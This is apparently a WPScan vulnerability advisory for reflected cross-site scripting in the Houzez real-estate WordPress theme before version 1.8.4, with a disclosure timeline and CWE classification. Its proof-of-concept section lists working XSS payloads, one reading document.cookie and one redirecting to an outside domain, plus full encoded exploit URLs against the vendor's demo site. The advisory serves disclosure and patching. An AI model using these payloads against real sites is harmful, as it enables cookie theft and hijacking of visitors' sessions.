Houzez < 1.8.4 - Unauthenticated Cross-Site Scripting (XSS)



Description
Two Reflected XSS vulnerability were discovered in the «Houzez - Real Estate WordPress Theme», tested version — v1.8.3.1

Edit (WPScanTeam):
January 11th, 2020 - Report received & Envato Contacted
January 12th, 2020 - Envato Investigating
January 27th, 2020 - v1.8.4 released, fixing the issue.
Proof of Concept
-Demo website:

https://houzez04.favethemes.com/

-Reflected XSS:

Payload Sample #0: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

Payload Sample #1: "><img src=x onerror=alert(document.cookie)>

PoC #0:

https://houzez04.favethemes.com/advanced-search/?keyword=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60m0ze%60%29%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location=&area=&status=&type=&bedrooms=&bathrooms=&min-area=&max-area=&min-price=%24200&max-price=%24500%2C000

PoC #1:

https://houzez04.favethemes.com/agent/?agent_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&category=&city=

Affects Theme

fixed in version 1.8.4

References

URL https://help.houzez.co/changelog/
URL https://themeforest.net/item/houzez-real-estate-wordpress-theme/15752549

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 5963
Verified Yes
WPVDB ID 10048

Timeline

Publicly Published 2020-01-11 (5 months ago)
Added 2020-01-28 (4 months ago)
Last Updated 2020-02-10 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin